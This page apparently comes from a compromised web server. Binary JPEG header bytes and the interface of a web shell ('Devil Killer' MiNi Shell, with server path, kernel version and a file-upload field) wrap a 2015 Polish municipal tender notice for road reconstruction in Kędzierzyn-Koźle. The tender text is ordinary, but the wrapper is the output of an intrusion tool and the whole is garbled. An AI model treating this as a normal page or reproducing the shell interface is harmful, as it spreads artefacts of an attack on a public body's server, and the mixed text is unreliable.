JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150220/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150220/38742-N-2015.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Przebudowa i rozbudowa ul. Kozielskiej etap III od KM 0 + 957,0 do KM 1 + 692,5 i etap IV od KM 1 + 692,5 do KM 1 + 792,8</b><br>
<b>Numer ogłoszenia: 38742 - 2015; data zamieszczenia: 20.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kędzierzyn-Koźle, Wydział Zamówień Publicznych , ul. Piramowicza 32, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 77 40 34 451, faks 77 40 34 451.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kedzierzynkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa ul. Kozielskiej etap III od KM 0 + 957,0 do KM 1 + 692,5 i etap IV od KM 1 + 692,5 do KM 1 + 792,8.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  są roboty budowlane ( drogowe) realizowane w oparciu o :
- Decyzje Nr 2/2013 o zezwoleniu na realizację inwestycji drogowej Starosty Kędzierzyńsko -Kozielskiego znak BA.6744.4.2013 z dnia 30.09.2013 dwuetapowa realizacja  zadania  :
 
W zakresie III  inwestycji  przebudowa i rozbudowa ul. Kozielskiej  w Kędzierzynie-Koźlu od km 0+957,0  do km 1+692,5 zakres robót obejmuje:
- przebudowę i rozbudowę ul. Kozielskiej
- budowę włączenia ul. Chopina , Padarewskiego, Koszykowej , Sobieskiego, Bema do ul. Kozielskiej
- budowę wysp  rozdzielających 
- budowę zatok autobusowych z wiatami przystankowymi.
Wiaty przystankowe z dachem płaskim , ścianami bocznymi , tylną , dachem - ze szkła hartowanego. Dodatkowo kosz i rozkład jazdy. Długości wiat: 
~  300cm ul. Kozielska 3
~  420cm ul. Kozielska 27
~  550cm ul. Kozielska na wysokości ul. Koszykowej

Ze względu  na zrealizowaną w etapie II zadania budowę  wiat przystankowych , wiaty realizowane w zakresie III nie mogą odbiegać pod względem kształtu , jakości zastosowanych materiałów , wyposażenia , kolorystyki , technologii wykonania od już istniejących.
(Istniejące wiaty przystankowe pokazano w załączniku do specyfikacji)
- budowę ścieżek rowerowych na całej długości przebudowywanych ulic
- budowę chodników  na całej długości przebudowywanych ulic uwzględnionych w 
  projekcie technicznym i załączniku do specyfikacji.
- budowę  nowych oraz przebudowę istniejących wjazdów do posesji
- budowę wraz z przebudową sieci kanalizacji deszczowej
- odwodnienie wykopów
- zabudowę rur ochronnych  dla sieci cieplnej
W zakresie projektu zabudowy rur ochronnych na sieci MZEC ma być zrealizowany zakres robót wyszczególniony w piśmie MZEC Sp,. z o.o z dnia 28.11.2014 wraz z warunkami wyszczególnionymi w w/w piśmie stanowiącym załącznik do specyfikacji.
- budowę i wraz z przebudową sieci teletechnicznych
- przebudowę sieci kanalizacji sanitarnej
- przebudowę sieci gazowej
- likwidacje lub likwidację i odtworzenie będących w kolizji z inwestycją ogrodzeń posesji
W realizacji projektu wykonawczego - część architektoniczna należy : 
Pominąć odtworzenie ogrodzenia O17, O18 , O20
Uwzględnić odtworzenie ogrodzenia O16 , O19 w zakresie objętym rozbiórką  w  formie dotychczas istniejącego ogrodzenia , bądź wykonać nowe  z uwzględnieniem warunków j.w.
- budowę wraz z przebudową oświetlenia i urządzeń elektroenergetycznych
Ze względu na zrealizowaną w etapie I i II zadania budowę oświetlenia  ulicznego , elementy oświetlenia ( słupy , wysięgniki , oprawy ) realizowane w  zakresie III nie mogą odbiegać pod względem kształtu , jakości  zastosowanych materiałów , wyposażenia , kolorystyki , technologii wykonania od już istniejących.
- wycinkę drzewostanu i zagospodarowanie terenu 
- wykonanie tymczasowego  oznakowania pionowego i poziomego dla 
  poszczególnych podetapów robót.
- wykonanie docelowego oznakowania pionowego i poziomego
- złomowanie wszystkich znaków podlegających wymianie
  
Uwaga !
Inwestor dla robót etapu III :
1. Wyraża zgodę na zamianę krawężnika kamiennego o wym. 20x35x100cm ujętego w projekcie na krawężnik kamienny o wym. 15x30x100cm.
2. Dopuszcza jako alternatywę dla podbudowy z betonu asfaltowego AC 16P  podbudowę z betonu asfaltowego AC 22P pod warunkiem posiadania  przez producenta  betonu asfaltowego atestu na kruszywo dla AC 22P.
3. Ustala kolorystykę kostki chodnikowej  chodnika na szerokości wjazdów  do posesji jak również samego wjazdu do posesji na kolor czarny.
4. Rezygnuje z ułożenia obrzeży betonowych na szerokości ścieżki rowerowej i chodnika w miejscu dojazdu do posesji.
5. Rezygnuje się z wykonania nawierzchni ścieżki rowerowej z asfaltu piaskowego koloru czerwonego. W ofercie należy uwzględnić  wykonanie nawierzchni ścieżki rowerowej z asfaltobetonu AC 8S koloru czarnego.

W zakresie IV inwestycji  przebudowa i rozbudowa  ul. Kozielskiej w Kędzierzynie-   Koźlu od km 1+692,5 do km 1+792,8 zakres robót obejmuje:
- przebudowę ulicy Kozielskiej
- budowę włączenia  ul. Bema , ul. Tartacznej do ul. Kozielskiej
- budowę wysp  rozdzielających 
- budowę ronda na skrzyżowaniu ul. Kozielskiej i Reja
- budowę ścieżek rowerowych na całej długości przebudowywanych ulic
- budowę chodników  na całej długości przebudowywanych ulic uwzględnionych w 
  projekcie technicznym i załączniku do specyfikacji
- budowę nowych oraz przebudowę  istniejących dojazdów do posesji
- budowę włączeń do ulic krzyżujących się
- budowę wraz z przebudową sieci kanalizacji deszczowej
- budowę wraz z przebudową sieci  teletechnicznych
- przebudowę sieci kanalizacji sanitarnej
- przebudowę sieci wodociągowej
- przebudowę sieci gazowej
- likwidację będących w kolizji z inwestycją  ogrodzeń posesji

W realizacji projektu wykonawczego - część architektoniczna należy uwzględnić : a) wykonanie nowego ogrodzenia panelowego z siatki stalowej ocynkowanej powlekanej na słupkach stalowych ocynkowanych powlekanych wys.150cm dług. ~ 31mb w miejsce projektowanego przesunięcia ogrodzenia O21 
b) budowę lub odtworzenie elementów małej architektury , w tym murków oporowych
c) budowę wraz z przebudową oświetlenia i urządzeń elektroenergetycznych
d) ze względu na zrealizowaną w etapie I i II zadania budowę oświetlenia  ulicznego , elementy oświetlenia ( słupy , wysięgniki , oprawy ) realizowane w  zakresie IV nie mogą odbiegać pod względem kształtu , jakości  zastosowanych materiałów , wyposażenia , kolorystyki , technologii wykonania od już istniejących.
e) wycinkę drzewostanu i zagospodarowanie terenu 
f) wykonanie tymczasowego oznakowania pionowego i poziomego dla poszczególnych podetapów robót
g) wykonanie docelowego oznakowania pionowego i poziomego
h) złomowanie wszystkich znaków podlegających wymianie

Roboty nie ujęte w projekcie technicznym, a podlegające wykonaniu
- ułożenie rur ochronnych typu : SRS 110 - 57mb , DWK 110 - 10mb , ułożenie bednarki Fe-Zn 30x4mm - 34mb (miejsce zabudowy wskazano w załączniku do specyfikacji).

Uwaga !
Inwestor dla robót etapu IV :
1. Wyraża zgodę na zamianę krawężnika kamiennego o wym.   20x35x100cm ujętego w projekcie na krawężnik kamienny o wym. 15x30x100cm.
2. Dopuszcza jako alternatywę dla podbudowy z betonu asfaltowego AC 16P  podbudowę z betonu asfaltowego AC 22P pod warunkiem posiadania  przez producenta  betonu asfaltowego atestu na kruszywo dla AC 22P.
3. Ustala kolorystykę kostki chodnikowej  chodnika na szerokości wjazdów  do posesji jak również samego wjazdu do posesji na kolor czarny.
4. Rezygnuje z ułożenia obrzeży betonowych na szerokości ścieżki rowerowej i chodnika w miejscu dojazdu do posesji.
5. Rezygnuje z wykonania nawierzchni ścieżki rowerowej z asfaltu piaskowego koloru czerwonego. W ofercie należy uwzględnić  wykonanie nawierzchni ścieżki rowerowej z asfaltobetonu AC 8S koloru czarnego.

Uwaga:
Warunkiem koniecznym dla rozpoczęcia robót IV zakresu przedmiotu zamówienia jest  całkowite zakończenie robót  III zakresu przedmiotu zamówienia

Szczegółowy opis przedmiotu zamówienia zawiera :
- projekt budowlany  etap III, i etap IV
- projekt wykonawczy - część drogowa etap III  i etap IV
- projekt wykonawczy - część kanalizacyjna  etap III  i etap IV
- projekt wykonawczy - część wodociągowa etap IV
- projekt wykonawczy - oświetlenie uliczne  etap III  i etap IV
- projekt wykonawczy - przebudowa sieci elektroenergetycznej etap III  i etap IV
- projekt wykonawczy - przebudowa urządzeń telekomunikacyjnych etap III i etap IV                                        
- projekt wykonawczy - część architektoniczna etap III  i etap IV
- projekt wykonawczy - część gazowa  etap III  i etap IV
- inwentaryzacja dendrologiczna - etap I , II , III , IV
- projekt wykonawczy -  tymczasowej organizacji ruchu etap III i  etap IV
- projekt wykonawczy -  docelowa organizacja ruch etap I , II , III , IV 
- dokumentacja  geotechniczna - etap I , II , III , IV                             
- Specyfikacja Techniczna Wykonania i Odbioru Robót  Budowlanych
   część- drogowa 
   część urządzenia obce
- uzgodnienia warunków technicznych do projektu budowlanego 
- pomocniczo dołączone przedmiary robót
Zaleca się aby Wykonawcy dokonali wizji lokalnej w terenie realizacji projektu w celu dokonania oceny dokumentów  i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.

Wykonanie zadania obejmuje dodatkowo:
1. Kompleksową obsługę geodezyjną wraz z powykonawczą inwentaryzacją geodezyjną w 3kpl. (w tym 1kpl. na nośniku elektronicznym) oraz zmianami w ewidencji w tym podział i wydzielenie gruntu pod obiekty. W inwentaryzacji powykonawczej należy też ująć zmianę użytkowania gruntów z budowlanych na drogowe !!!.Format i zawartość plików zawierających pomiary powykonawcze w postaci wektorowej. Format plików to .DWG lub .DXF. Do plików ma być dołączona informacja o zastosowanym układzie współrzędnych. Stosowany obecnie na terenie gminy to: 1965 strefa IV. Zamieszczone na mapach obrysy obiektów winny być rozdzielone wg branż na warstwy i opisane zgodnie z instrukcją techniczną K-1 dot. map zasadniczych. Z uwagi na specyfikę obiekty oświetlenia ulic - o ile występują - winny być opisane następującymi warstwami: kable przyłączy nn. - polilinia1), / kable obwodów oświetleniowych - polilinia1), rury osłonowe - odcinek, mufy - punkt,  latarnie - punkt 2), szafki oświetlenia ulicznego -  prostokąt 2) gdzie 1) - opis kabla o niezmiennym przekroju (bez przerw na odcinkach zarurowanych), 2) - obiekt opisany dodatkowo nr określonym w dokumentacji projektowej.
2. Wykonanie dokumentacji powykonawczej w tym:  
  -    dokumentacji geodezyjnej uwzględniającej zmianę użytkowania gruntów                                   
  -    pomiarów fotometrycznych oświetlenia ulicznego.
3. Organizację, zagospodarowanie i likwidację placu budowy.
4. Sporządzenie planu bezpieczeństwa i ochrony zdrowia ,  jeżeli odrębne przepisy wymagają sporządzenia takiego planu.
5. Sukcesywną zmianę organizacji ruchu i oznakowania budowy w zależności od etapu realizowanej inwestycji i zakresu wykonanych prac.   
6. Zapewnienie dojazdu do posesji i punktów handlowych w czasie prowadzonych robót.
7. Przy pracach z zakresu sieci gazowych uwzględnienie wymogów zawartych w uzgodnieniach do projektu.
8. Przy pracach z zakresu kanalizacji i wodociągów : kamerowanie sieci i uwzględnienie  wymogów MWiK zawartych w uzgodnieniach do projektu
9. Przy pracach zakresu sieci teletechnicznych uwzględnienie wymogów zawartych w uzgodnieniach do projektu !
10. Przy pracach z zakresu sieci elektroenergetycznych uwzględnienie wymogów zawartych w uzgodnieniach do projektu.
11. Przy pracach w pobliżu sieci c.o. uwzględnienie wymogów zawartych w uzgodnieniach do projektu. 
12. Remonty i naprawę zniszczonej nawierzchni w ulicach i chodnikach nie objętych zakresem projektu
13. Próby i odbiory z udziałem wymaganych instytucji państwowych, inwestora i użytkownika.  
14. Zebranie odpadów powstałych w wyników realizacji przedmiotu zamówienia i  przekazanie ich do odzysku, unieszkodliwienia lub składowania. Powstałe  w ten sposób odpady - w tym również wszelkiego rodzaju nadziemne, podziemne,  nieorganiczne i organiczne pozostałości typu gruz, złom, pnie, korzenie, karpiny  itp. - należy bez zbędnej zwłoki wywieźć  na Regionalną Instalację  Przetwarzania Odpadów Komunalnych lub  przekazać  przedsiębiorcy posiadającemu zezwolenie na transport odpadów zgodnie z obowiązującymi przepisami. Składowanie w rejonie placu budowy w miejscu wskazanym przez Zamawiającego  zdemontowanych   materiałów  nadających się do odzysku jest możliwe na okres  nie dłuższym niż termin realizacji przedmiotu zamówienia. 
Wykonawca jest  zobowiązany przedstawić  zamawiającemu dokumenty potwierdzające  złożenie wytworzonych odpadów na  Regionalną Instalację Odpadów Komunalnych lub  przekazanie  przedsiębiorcy posiadającemu zezwolenie na transport  odpadów.
15 .Zamawiający zastrzega sobie do ponownego wykorzystania następujące materiały z rozbiórki : płytki chodnikowe , kostka chodnikowa , kostka granitowa, krawężniki, obrzeża chodnikowe, wpusty uliczne, wiaty przystankowe w całości  lub ich elementy . W  związku z czym należy przewidzieć czysty sposób  ich demontażu z obiektu budowlanego umożliwiający ponowne ich  wykorzystanie  oraz nie należy ich utylizować lub przekazywać przedsiębiorcy  posiadającemu zezwolenie na transport odpadów  zgodnie z obowiązującymi  przepisami. 
16.  Decyzję co do ponownego wykorzystania materiałów pochodzących z rozbiórki podejmie Inspektor bezpośrednio przed rozbiórką. Materiały winny być umieszczone na paletach i przygotowane do transportu. Zagospodarowanie materiałów pochodzących z rozbiórki , zakwalifikowanych do ponownego wykorzystania leży po stronie  Inwestora.
17. W przypadkach gdy  konieczna jest wycinka  drzew, pocięcie ich na odcinki o dł. 120 cm i uformowanie w   stosy na placu  budowy lub w jego bezpośrednim sąsiedztwie w  miejscu  wskazanym   przez zamawiającego. 
18. Wykonanie i  zamontowanie tablic informacyjnych metalowych powlekanych ( lub równoważnych ) w trakcie i po realizacji zadania t wg. wzorca zamieszczonego w wersji  elektronicznej. - tablica o wym. 150cmx 100cm na słupkach metalowych w czasie trwania inwestycji, tablica o wym. 150cm x100cm na słupkach metalowych po zakończeniu inwestycji.
19.Uporządkowanie terenu budowy po zakończeniu robót.

ZAMAWIAJACY ZASTRZEGA SOBIE WYNAGRODZENIE RYCZAŁTOWE 
HARMONOGRAM RZECZOWO-FINANSOWY - Wykonawca przedłoży jako załącznik do umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 190.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100 000.00 zł (słownie: sto tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 5 lat tj. od 08.03.2010r. do 08.03.2015r., a jeżeli okres prowadzenia działalności jest krótszy - (w tym okresie) wykonał roboty budowlane w zakresie robót drogowych wraz z infrastrukturą drogową tj. budową kanalizacji deszczowej (sieci wodociągowej) i oświetlenia drogowego na wartości łączną minimum  10.000.000,00 zł brutto, 
albo
wykonał co najmniej trzy roboty w tym: 
a. 1 robotę w zakresie robót drogowych o wartości nie mniejszej niż  5.000.000,00 zł brutto
b. 1 robotę w zakresie kanalizacji deszczowej (sieci wodociągowej) o wartości nie mniejszej niż  300.000,00 zł brutto 
c. 1 robotę w zakresie oświetlenia ulicznego nie mniejszej niż 150.000,00 zł brutto z potwierdzeniem ich należytego wykonania.
W przypadku ofert wspólnych, doświadczenie podlega sumowaniu. Warunkiem koniecznym jest, aby suma doświadczenia wynosiła minimum 100% doświadczenia wymaganego przez SIWZ. Warunek ten jest spełniony również, jeżeli jeden z wykonawców posiada 100% wymaganego doświadczenia.
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie Kierownikami  w następujących specjalnościach:
1. Kierownik budowy musi posiadać uprawnienia budowlane  w specjalności
konstrukcyjno-inżynieryjnej w zakresie drogi oraz aktualne zaświadczenie z PIIB oraz  5 lat praktyki zawodowej  jako kierownik budowy.
2. Kierownik robót z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci , instalacji i urządzeń elektrycznych i elektroenergetycznych- posiadający aktualne zaświadczenie z PIIB  oraz  2 lata praktyki zawodowej jako kierownik budowy lub kierownik robót.
3. Kierownik robót z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych posiadający aktualne zaświadczenie z PIIB oraz  2lata praktyki zawodowej  jako kierownik  budowy lub kierownik robót.
4. Kierownik robót z uprawnieniami budowlanymi do kierowania robotami w budownictwie  telekomunikacyjnym  w specjalnościach instalacyjnych w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą      
posiadający   aktualne zaświadczenie z PIIB  oraz  2lata praktyki jako kierownik budowy lub kierownik robót
5. Kierownik robót z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń gazowych posiadający aktualne zaświadczenie z PIIB  oraz  2 lata praktyki jako kierownik budowy lub kierownik robót
Dopuszcza się łączenie funkcji kierownika robót z kierownikiem robót w pozostałych branżach przy spełnieniu powyższych wymagań.
W przypadku ofert wspólnych, zasoby ludzkie wykonawców występujących wspólnie podlegają sumowaniu.
W przypadku, gdy Wykonawca dysponuje personelem kierowniczym spoza terytorium RP, to osoby te muszą:
- posiadać wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanej branży budowlanej w kraju zamieszkania tych osób,
- posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanej branży budowlanej zgodnie z ustawą z dnia 18 marca 2008r. o zasadach uznawaniu kwalifikacji zawodowych w państwach członkowskich Unii Europejskiej lub posiadać prawo do świadczenia usług transgranicznych,
- spełniać opisane wymagania odnośnie doświadczenia.
Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie na koncie środków finansowych w wysokości, co najmniej 1.000.000,00- zł lub posiadanie zdolności kredytowej do zaciągnięcia kredytu w tej wysokości lub w wysokości uzupełniającej środki posiadane na koncie do wymaganej kwoty. W przypadku wykonawców występujących wspólnie, posiadane środki przez poszczególnych wykonawców podlegają sumowaniu. Dopuszczone jest również sumowanie kwoty posiadanej na koncie przez jednego wykonawcę z możliwością zaciągnięcia kredytu uzupełniającego do kwoty wymaganej przez drugiego wykonawcę. Jeżeli Wykonawca korzysta z zasobów innego podmiotu dopuszcza się również sumowanie środków Wykonawcy ze środkami podmiotu udostępniającego swoje zasoby. Warunkiem koniecznym jest, aby suma środków poszczególnych wykonawców wynosiła minimum 100 % wymaganych środków określonych w warunkach SIWZ. Zamawiający będzie oceniał powyższy warunek na podstawie złożonych dokumentów potwierdzających spełnienie warunku. Ocena dokonana będzie systemem spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

